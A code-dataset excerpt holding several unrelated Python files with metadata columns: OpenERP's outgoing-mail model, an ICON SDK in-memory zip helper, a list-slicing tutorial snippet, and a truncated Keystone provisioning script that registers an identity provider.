hexsha stringlengths 40 40 | size int64 7 1.04M | ext stringclasses 10 values | lang stringclasses 1 value | max_stars_repo_path stringlengths 4 247 | max_stars_repo_name stringlengths 4 125 | max_stars_repo_head_hexsha stringlengths 40 78 | max_stars_repo_licenses listlengths 1 10 | max_stars_count int64 1 368k ⌀ | max_stars_repo_stars_event_min_datetime stringlengths 24 24 ⌀ | max_stars_repo_stars_event_max_datetime stringlengths 24 24 ⌀ | max_issues_repo_path stringlengths 4 247 | max_issues_repo_name stringlengths 4 125 | max_issues_repo_head_hexsha stringlengths 40 78 | max_issues_repo_licenses listlengths 1 10 | max_issues_count int64 1 116k ⌀ | max_issues_repo_issues_event_min_datetime stringlengths 24 24 ⌀ | max_issues_repo_issues_event_max_datetime stringlengths 24 24 ⌀ | max_forks_repo_path stringlengths 4 247 | max_forks_repo_name stringlengths 4 125 | max_forks_repo_head_hexsha stringlengths 40 78 | max_forks_repo_licenses listlengths 1 10 | max_forks_count int64 1 105k ⌀ | max_forks_repo_forks_event_min_datetime stringlengths 24 24 ⌀ | max_forks_repo_forks_event_max_datetime stringlengths 24 24 ⌀ | content stringlengths 1 1.04M | avg_line_length float64 1.77 618k | max_line_length int64 1 1.02M | alphanum_fraction float64 0 1 | original_content stringlengths 7 1.04M | filtered:remove_function_no_docstring int64 -102 942k | filtered:remove_class_no_docstring int64 -354 977k | filtered:remove_delete_markers int64 0 60.1k |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
b558f4729be0aa98c2ad900457f20593df16d0f5 | 17,012 | py | Python | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 3 | 2016-01-29T14:39:49.000Z | 2018-12-29T22:42:00.000Z | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | 2 | 2016-03-23T14:29:41.000Z | 2017-02-20T17:11:30.000Z | openerp/addons/mail/mail_mail.py | ntiufalara/openerp7 | 903800da0644ec0dd9c1dcd34205541f84d45fe4 | [
"MIT"
] | null | null | null | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
def process_email_queue(self, cr, uid, ids=None, context=None):
"""Send immediately queued messages, committing after each
message is sent - this is not transactional and should
not be called during another transaction!
:param list ids: optional list of emails ids to send. If passed
no search is performed, and these ids are used
instead.
:param dict context: if a 'filters' key is present in context,
this value will be used as an additional
filter to further restrict the outgoing
messages to send (by default all 'outgoing'
messages are sent).
"""
if context is None:
context = {}
if not ids:
filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
if 'filters' in context:
filters.extend(context['filters'])
ids = self.search(cr, uid, filters, context=context)
res = None
try:
# Force auto-commit - this is meant to be called by
# the scheduler, and we can't allow rolling back the status
# of previously sent emails!
res = self.send(cr, uid, ids, auto_commit=True, context=context)
except Exception:
_logger.exception("Failed processing mail queue")
return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if (force or not mail.subject) and mail.record_name:
return 'Re: %s' % (mail.record_name)
elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
return 'Re: %s' % (mail.parent_id.subject)
return mail.subject
def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email body. The main purpose of this method
is to be inherited by Portal, to add a link for signing in, in
each notification email a partner receives.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = mail.body_html
# partner is a user, link to a related document (incentive to install portal)
if partner and partner.user_ids and mail.model and mail.res_id \
and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
related_user = partner.user_ids[0]
try:
self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# the parameters to encode for the query and fragment part of url
query = {'db': cr.dbname}
fragment = {
'login': related_user.login,
'model': mail.model,
'id': mail.res_id,
}
url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
except except_orm, e:
pass
return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email reply_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if mail.reply_to:
return mail.reply_to
email_reply_to = False
# if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
# no alias reply_to -> reply_to will be the email_from, only the email part
if not email_reply_to and mail.email_from:
emails = tools.email_split(mail.email_from)
if emails:
email_reply_to = emails[0]
# format 'Document name <email_address>'
if email_reply_to and mail.model and mail.res_id:
document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
if document_name:
# sanitize document name
sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
# generate reply to
email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
return email_reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
""" Return a dictionary for specific email values, depending on a
partner, or generic to the whole recipients given by mail.email_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
body_alternative = tools.html2plaintext(body)
# generate email_to, heuristic:
# 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
# 2. if 'partner' is specified, but no related document: Partner Name <email>
# 3; fallback on mail.email_to that we split to have an email addresses list
if partner and mail.record_name:
sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
elif partner:
email_to = ['%s <%s>' % (partner.name, partner.email)]
else:
email_to = tools.email_split(mail.email_to)
return {
'body': body,
'body_alternative': body_alternative,
'subject': subject,
'email_to': email_to,
'reply_to': reply_to,
}
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
""" Sends the selected emails immediately, ignoring their current
state (mails that have already been sent should not be passed
unless they should actually be re-sent).
Emails successfully delivered are marked as 'sent', and those
that fail to be deliver are marked as 'exception', and the
corresponding error mail is output in the server logs.
:param bool auto_commit: whether to force a commit of the mail status
after sending each mail (meant only for scheduler processing);
should never be True during normal transactions (default: False)
:param list recipient_ids: specific list of res.partner recipients.
If set, one email is sent to each partner. Its is possible to
tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
If not specified, one email is sent to mail_mail.email_to.
:return: True
"""
ir_mail_server = self.pool.get('ir.mail_server')
for mail in self.browse(cr, uid, ids, context=context):
try:
# handle attachments
attachments = []
for attach in mail.attachment_ids:
attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
# specific behavior to customize the send email for notified partners
email_list = []
if recipient_ids:
partner_obj = self.pool.get('res.partner')
existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
else:
email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
# build an RFC2822 email.message.Message object and send it without queuing
res = None
for email in email_list:
msg = ir_mail_server.build_email(
email_from = mail.email_from,
email_to = email.get('email_to'),
subject = email.get('subject'),
body = email.get('body'),
body_alternative = email.get('body_alternative'),
email_cc = tools.email_split(mail.email_cc),
reply_to = email.get('reply_to'),
attachments = attachments,
message_id = mail.message_id,
references = mail.references,
object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
subtype = 'html',
subtype_alternative = 'plain')
res = ir_mail_server.send_email(cr, uid, msg,
mail_server_id=mail.mail_server_id.id, context=context)
if res:
mail.write({'state': 'sent', 'message_id': res})
mail_sent = True
else:
mail.write({'state': 'exception'})
mail_sent = False
# /!\ can't use mail.state here, as mail.refresh() will cause an error
# see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
if mail_sent:
self._postprocess_sent_message(cr, uid, mail, context=context)
except MemoryError:
# prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
# instead of marking the mail as failed
raise
except Exception:
_logger.exception('failed sending mail.mail %s', mail.id)
mail.write({'state': 'exception'})
if auto_commit == True:
cr.commit()
return True
| 51.087087 | 133 | 0.6081 | # -*- coding: utf-8 -*-
##############################################################################
#
# OpenERP, Open Source Management Solution
# Copyright (C) 2010-today OpenERP SA (<http://www.openerp.com>)
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as
# published by the Free Software Foundation, either version 3 of the
# License, or (at your option) any later version
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details
#
# You should have received a copy of the GNU Affero General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>
#
##############################################################################
import base64
import logging
import re
from urllib import urlencode
from urlparse import urljoin
from openerp import tools
from openerp import SUPERUSER_ID
from openerp.osv import fields, osv
from openerp.osv.orm import except_orm
from openerp.tools.translate import _
_logger = logging.getLogger(__name__)
class mail_mail(osv.Model):
""" Model holding RFC2822 email messages to send. This model also provides
facilities to queue and send new email messages. """
_name = 'mail.mail'
_description = 'Outgoing Mails'
_inherits = {'mail.message': 'mail_message_id'}
_order = 'id desc'
_columns = {
'mail_message_id': fields.many2one('mail.message', 'Message', required=True, ondelete='cascade'),
'mail_server_id': fields.many2one('ir.mail_server', 'Outgoing mail server', readonly=1),
'state': fields.selection([
('outgoing', 'Outgoing'),
('sent', 'Sent'),
('received', 'Received'),
('exception', 'Delivery Failed'),
('cancel', 'Cancelled'),
], 'Status', readonly=True),
'auto_delete': fields.boolean('Auto Delete',
help="Permanently delete this email after sending it, to save space"),
'references': fields.text('References', help='Message references, such as identifiers of previous messages', readonly=1),
'email_from': fields.char('From', help='Message sender, taken from user preferences.'),
'email_to': fields.text('To', help='Message recipients'),
'email_cc': fields.char('Cc', help='Carbon copy message recipients'),
'reply_to': fields.char('Reply-To', help='Preferred response address for the message'),
'body_html': fields.text('Rich-text Contents', help="Rich-text/HTML message"),
# Auto-detected based on create() - if 'mail_message_id' was passed then this mail is a notification
# and during unlink() we will not cascade delete the parent and its attachments
'notification': fields.boolean('Is Notification')
}
def _get_default_from(self, cr, uid, context=None):
this = self.pool.get('res.users').browse(cr, uid, uid, context=context)
if this.alias_domain:
return '%s@%s' % (this.alias_name, this.alias_domain)
elif this.email:
return this.email
raise osv.except_osv(_('Invalid Action!'), _("Unable to send email, please configure the sender's email address or alias."))
_defaults = {
'state': 'outgoing',
'email_from': lambda self, cr, uid, ctx=None: self._get_default_from(cr, uid, ctx),
}
def default_get(self, cr, uid, fields, context=None):
# protection for `default_type` values leaking from menu action context (e.g. for invoices)
# To remove when automatic context propagation is removed in web client
if context and context.get('default_type') and context.get('default_type') not in self._all_columns['type'].column.selection:
context = dict(context, default_type=None)
return super(mail_mail, self).default_get(cr, uid, fields, context=context)
def create(self, cr, uid, values, context=None):
if 'notification' not in values and values.get('mail_message_id'):
values['notification'] = True
return super(mail_mail, self).create(cr, uid, values, context=context)
def unlink(self, cr, uid, ids, context=None):
# cascade-delete the parent message for all mails that are not created for a notification
ids_to_cascade = self.search(cr, uid, [('notification', '=', False), ('id', 'in', ids)])
parent_msg_ids = [m.mail_message_id.id for m in self.browse(cr, uid, ids_to_cascade, context=context)]
res = super(mail_mail, self).unlink(cr, uid, ids, context=context)
self.pool.get('mail.message').unlink(cr, uid, parent_msg_ids, context=context)
return res
def mark_outgoing(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'outgoing'}, context=context)
def cancel(self, cr, uid, ids, context=None):
return self.write(cr, uid, ids, {'state': 'cancel'}, context=context)
def process_email_queue(self, cr, uid, ids=None, context=None):
"""Send immediately queued messages, committing after each
message is sent - this is not transactional and should
not be called during another transaction!
:param list ids: optional list of emails ids to send. If passed
no search is performed, and these ids are used
instead.
:param dict context: if a 'filters' key is present in context,
this value will be used as an additional
filter to further restrict the outgoing
messages to send (by default all 'outgoing'
messages are sent).
"""
if context is None:
context = {}
if not ids:
filters = ['&', ('state', '=', 'outgoing'), ('type', '=', 'email')]
if 'filters' in context:
filters.extend(context['filters'])
ids = self.search(cr, uid, filters, context=context)
res = None
try:
# Force auto-commit - this is meant to be called by
# the scheduler, and we can't allow rolling back the status
# of previously sent emails!
res = self.send(cr, uid, ids, auto_commit=True, context=context)
except Exception:
_logger.exception("Failed processing mail queue")
return res
def _postprocess_sent_message(self, cr, uid, mail, context=None):
"""Perform any post-processing necessary after sending ``mail``
successfully, including deleting it completely along with its
attachment if the ``auto_delete`` flag of the mail was set.
Overridden by subclasses for extra post-processing behaviors.
:param browse_record mail: the mail that was just sent
:return: True
"""
if mail.auto_delete:
# done with SUPERUSER_ID to avoid giving large unlink access rights
self.unlink(cr, SUPERUSER_ID, [mail.id], context=context)
return True
def send_get_mail_subject(self, cr, uid, mail, force=False, partner=None, context=None):
""" If subject is void and record_name defined: '<Author> posted on <Resource>'
:param boolean force: force the subject replacement
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if (force or not mail.subject) and mail.record_name:
return 'Re: %s' % (mail.record_name)
elif (force or not mail.subject) and mail.parent_id and mail.parent_id.subject:
return 'Re: %s' % (mail.parent_id.subject)
return mail.subject
def send_get_mail_body(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email body. The main purpose of this method
is to be inherited by Portal, to add a link for signing in, in
each notification email a partner receives.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = mail.body_html
# partner is a user, link to a related document (incentive to install portal)
if partner and partner.user_ids and mail.model and mail.res_id \
and self.check_access_rights(cr, partner.user_ids[0].id, 'read', raise_exception=False):
related_user = partner.user_ids[0]
try:
self.pool.get(mail.model).check_access_rule(cr, related_user.id, [mail.res_id], 'read', context=context)
base_url = self.pool.get('ir.config_parameter').get_param(cr, uid, 'web.base.url')
# the parameters to encode for the query and fragment part of url
query = {'db': cr.dbname}
fragment = {
'login': related_user.login,
'model': mail.model,
'id': mail.res_id,
}
url = urljoin(base_url, "?%s#%s" % (urlencode(query), urlencode(fragment)))
text = _("""<p>Access this document <a href="%s">directly in OpenERP</a></p>""") % url
body = tools.append_content_to_html(body, ("<div><p>%s</p></div>" % text), plaintext=False)
except except_orm, e:
pass
return body
def send_get_mail_reply_to(self, cr, uid, mail, partner=None, context=None):
""" Return a specific ir_email reply_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
if mail.reply_to:
return mail.reply_to
email_reply_to = False
# if model and res_id: try to use ``message_get_reply_to`` that returns the document alias
if mail.model and mail.res_id and hasattr(self.pool.get(mail.model), 'message_get_reply_to'):
email_reply_to = self.pool.get(mail.model).message_get_reply_to(cr, uid, [mail.res_id], context=context)[0]
# no alias reply_to -> reply_to will be the email_from, only the email part
if not email_reply_to and mail.email_from:
emails = tools.email_split(mail.email_from)
if emails:
email_reply_to = emails[0]
# format 'Document name <email_address>'
if email_reply_to and mail.model and mail.res_id:
document_name = self.pool.get(mail.model).name_get(cr, SUPERUSER_ID, [mail.res_id], context=context)[0]
if document_name:
# sanitize document name
sanitized_doc_name = re.sub(r'[^\w+.]+', '-', document_name[1])
# generate reply to
email_reply_to = _('"Followers of %s" <%s>') % (sanitized_doc_name, email_reply_to)
return email_reply_to
def send_get_email_dict(self, cr, uid, mail, partner=None, context=None):
""" Return a dictionary for specific email values, depending on a
partner, or generic to the whole recipients given by mail.email_to.
:param browse_record mail: mail.mail browse_record
:param browse_record partner: specific recipient partner
"""
body = self.send_get_mail_body(cr, uid, mail, partner=partner, context=context)
subject = self.send_get_mail_subject(cr, uid, mail, partner=partner, context=context)
reply_to = self.send_get_mail_reply_to(cr, uid, mail, partner=partner, context=context)
body_alternative = tools.html2plaintext(body)
# generate email_to, heuristic:
# 1. if 'partner' is specified and there is a related document: Followers of 'Doc' <email>
# 2. if 'partner' is specified, but no related document: Partner Name <email>
# 3; fallback on mail.email_to that we split to have an email addresses list
if partner and mail.record_name:
sanitized_record_name = re.sub(r'[^\w+.]+', '-', mail.record_name)
email_to = [_('"Followers of %s" <%s>') % (sanitized_record_name, partner.email)]
elif partner:
email_to = ['%s <%s>' % (partner.name, partner.email)]
else:
email_to = tools.email_split(mail.email_to)
return {
'body': body,
'body_alternative': body_alternative,
'subject': subject,
'email_to': email_to,
'reply_to': reply_to,
}
def send(self, cr, uid, ids, auto_commit=False, recipient_ids=None, context=None):
""" Sends the selected emails immediately, ignoring their current
state (mails that have already been sent should not be passed
unless they should actually be re-sent).
Emails successfully delivered are marked as 'sent', and those
that fail to be deliver are marked as 'exception', and the
corresponding error mail is output in the server logs.
:param bool auto_commit: whether to force a commit of the mail status
after sending each mail (meant only for scheduler processing);
should never be True during normal transactions (default: False)
:param list recipient_ids: specific list of res.partner recipients.
If set, one email is sent to each partner. Its is possible to
tune the sent email through ``send_get_mail_body`` and ``send_get_mail_subject``.
If not specified, one email is sent to mail_mail.email_to.
:return: True
"""
ir_mail_server = self.pool.get('ir.mail_server')
for mail in self.browse(cr, uid, ids, context=context):
try:
# handle attachments
attachments = []
for attach in mail.attachment_ids:
attachments.append((attach.datas_fname, base64.b64decode(attach.datas)))
# specific behavior to customize the send email for notified partners
email_list = []
if recipient_ids:
partner_obj = self.pool.get('res.partner')
existing_recipient_ids = partner_obj.exists(cr, SUPERUSER_ID, recipient_ids, context=context)
for partner in partner_obj.browse(cr, SUPERUSER_ID, existing_recipient_ids, context=context):
email_list.append(self.send_get_email_dict(cr, uid, mail, partner=partner, context=context))
else:
email_list.append(self.send_get_email_dict(cr, uid, mail, context=context))
# build an RFC2822 email.message.Message object and send it without queuing
res = None
for email in email_list:
msg = ir_mail_server.build_email(
email_from = mail.email_from,
email_to = email.get('email_to'),
subject = email.get('subject'),
body = email.get('body'),
body_alternative = email.get('body_alternative'),
email_cc = tools.email_split(mail.email_cc),
reply_to = email.get('reply_to'),
attachments = attachments,
message_id = mail.message_id,
references = mail.references,
object_id = mail.res_id and ('%s-%s' % (mail.res_id, mail.model)),
subtype = 'html',
subtype_alternative = 'plain')
res = ir_mail_server.send_email(cr, uid, msg,
mail_server_id=mail.mail_server_id.id, context=context)
if res:
mail.write({'state': 'sent', 'message_id': res})
mail_sent = True
else:
mail.write({'state': 'exception'})
mail_sent = False
# /!\ can't use mail.state here, as mail.refresh() will cause an error
# see revid:odo@openerp.com-20120622152536-42b2s28lvdv3odyr in 6.1
if mail_sent:
self._postprocess_sent_message(cr, uid, mail, context=context)
except MemoryError:
# prevent catching transient MemoryErrors, bubble up to notify user or abort cron job
# instead of marking the mail as failed
raise
except Exception:
_logger.exception('failed sending mail.mail %s', mail.id)
mail.write({'state': 'exception'})
if auto_commit == True:
cr.commit()
return True
| 1,826 | 0 | 162 |
27acaab673252d4b7266cdbbc2d11f4abab7293b | 3,043 | py | Python | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 51 | 2018-08-29T04:15:36.000Z | 2022-03-14T10:02:08.000Z | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 24 | 2018-09-03T03:16:19.000Z | 2022-01-17T08:28:04.000Z | iconsdk/libs/in_memory_zip.py | geometry-labs/icon-sdk-python | e530df02eb16b394c3022d2d7d0383bd972e129a | [
"Apache-2.0"
] | 44 | 2018-09-06T22:36:16.000Z | 2022-03-15T06:46:05.000Z | # -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
"""Generate bytes of zip data of SCORE.
:param _path: Path of the directory to be zipped.
"""
if path.isdir(_path) is False and path.isfile(_path) is False:
raise ValueError(f"Invalid path {_path}")
try:
memory_zip = InMemoryZip()
memory_zip.zip_in_memory(_path)
except ZipException:
raise ZipException(f"Can't zip SCORE contents")
else:
return memory_zip.data
class InMemoryZip:
"""Class for compressing data in memory using zip and BytesIO."""
@property
def data(self) -> bytes:
"""Returns zip data
:return: zip data
"""
self._in_memory.seek(0)
return self._in_memory.read()
def zip_in_memory(self, _path: str):
"""Compress zip data (bytes) in memory.
:param _path: The path of the directory to be zipped.
"""
try:
# when it is a zip file
if path.isfile(_path):
zf = ZipFile(_path, 'r', ZIP_DEFLATED, False)
zf.testzip()
with open(_path, mode='rb') as fp:
fp.seek(0)
self._in_memory.seek(0)
self._in_memory.write(fp.read())
else:
# root path for figuring out directory of tests
tmp_root = None
with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
for root, folders, files in walk(_path):
if 'package.json' in files:
tmp_root = root
if tmp_root and root.replace(tmp_root,'') == '/tests':
continue
if root.find('__pycache__') != -1:
continue
if root.find('/.') != -1:
continue
for file in files:
if file.startswith('.'):
continue
full_path = path.join(root, file)
zf.write(full_path)
except ZipException:
raise ZipException
| 34.191011 | 95 | 0.562603 | # -*- coding: utf-8 -*-
# Copyright 2018 ICON Foundation
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
from io import BytesIO
from os import path, walk
from zipfile import ZipFile, ZIP_DEFLATED
from iconsdk.exception import ZipException
def gen_deploy_data_content(_path: str) -> bytes:
"""Generate bytes of zip data of SCORE.
:param _path: Path of the directory to be zipped.
"""
if path.isdir(_path) is False and path.isfile(_path) is False:
raise ValueError(f"Invalid path {_path}")
try:
memory_zip = InMemoryZip()
memory_zip.zip_in_memory(_path)
except ZipException:
raise ZipException(f"Can't zip SCORE contents")
else:
return memory_zip.data
class InMemoryZip:
"""Class for compressing data in memory using zip and BytesIO."""
def __init__(self):
self._in_memory = BytesIO()
@property
def data(self) -> bytes:
"""Returns zip data
:return: zip data
"""
self._in_memory.seek(0)
return self._in_memory.read()
def zip_in_memory(self, _path: str):
"""Compress zip data (bytes) in memory.
:param _path: The path of the directory to be zipped.
"""
try:
# when it is a zip file
if path.isfile(_path):
zf = ZipFile(_path, 'r', ZIP_DEFLATED, False)
zf.testzip()
with open(_path, mode='rb') as fp:
fp.seek(0)
self._in_memory.seek(0)
self._in_memory.write(fp.read())
else:
# root path for figuring out directory of tests
tmp_root = None
with ZipFile(self._in_memory, 'a', ZIP_DEFLATED, False, compresslevel=9) as zf:
for root, folders, files in walk(_path):
if 'package.json' in files:
tmp_root = root
if tmp_root and root.replace(tmp_root,'') == '/tests':
continue
if root.find('__pycache__') != -1:
continue
if root.find('/.') != -1:
continue
for file in files:
if file.startswith('.'):
continue
full_path = path.join(root, file)
zf.write(full_path)
except ZipException:
raise ZipException
| 34 | 0 | 27 |
c21fb14af02a04b30a0dc5a0c0615136eac0e954 | 381 | py | Python | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | CH01_Algorithm_ADS/1.11.Naming_a_slice.py | Chang-Liu-TAMU/Python-Cookbook-reading | 7b974c32f77b4b3d7cfeed30d1671081057c566f | [
"MIT"
] | null | null | null | a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| 17.318182 | 37 | 0.603675 | a = list(range(10))
slice1 = slice(0, 3)
slice2 = slice(4, 8)
print(a[slice1])
print(a[slice2])
a[slice2] = ["@", "#", "$", "%"]
print(a)
del a[slice1]
print(a)
print(f"slice start: {slice1.start}")
print(f"slice stop: {slice1.stop}")
print(f"slice step: {slice1.step}")
c = slice(0, 100, 3)
s = "0as0ef0df0vd0ef0d"
for i in range(*c.indices(len(s))):
print(s[i], end='')
| 0 | 0 | 0 |
d713f5b3fe1e13db25afe646381d31f344f05f8d | 2,293 | py | Python | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | null | null | null | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | 5 | 2015-12-10T07:48:20.000Z | 2016-03-16T09:44:42.000Z | provision/08-create-keystone-stuff.py | norcams/himlar-connect | 8d375953aa6747471d1b32cf3b8a7b1dd1a1adf4 | [
"Apache-2.0"
] | null | null | null | #!/usr/bin/env python
import ConfigParser
import requests
import json
cp = ConfigParser.SafeConfigParser()
cp.read('/etc/keystone/keystone.conf')
token = cp.get('DEFAULT', 'admin_token')
baseurl = 'http://localhost:35357/v3/OS-FEDERATION'
headers = {
'X-Auth-Token': token,
'Content-Type': 'application/json',
}
with open('/opt/himlar/json/create-idp.json') as fh:
data = fh.read()
response = requests.put(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
if response.status_code == 409:
response = requests.patch(baseurl + '/identity_providers/dataporten',
headers=headers, data=data)
response.raise_for_status()
resp = requests.get('http://localhost:35357/v3/domains', headers=headers)
domains = resp.json()['domains']
domain_id = None
for domain in domains:
if domain['name'] == u'connect':
domain_id = domain['id']
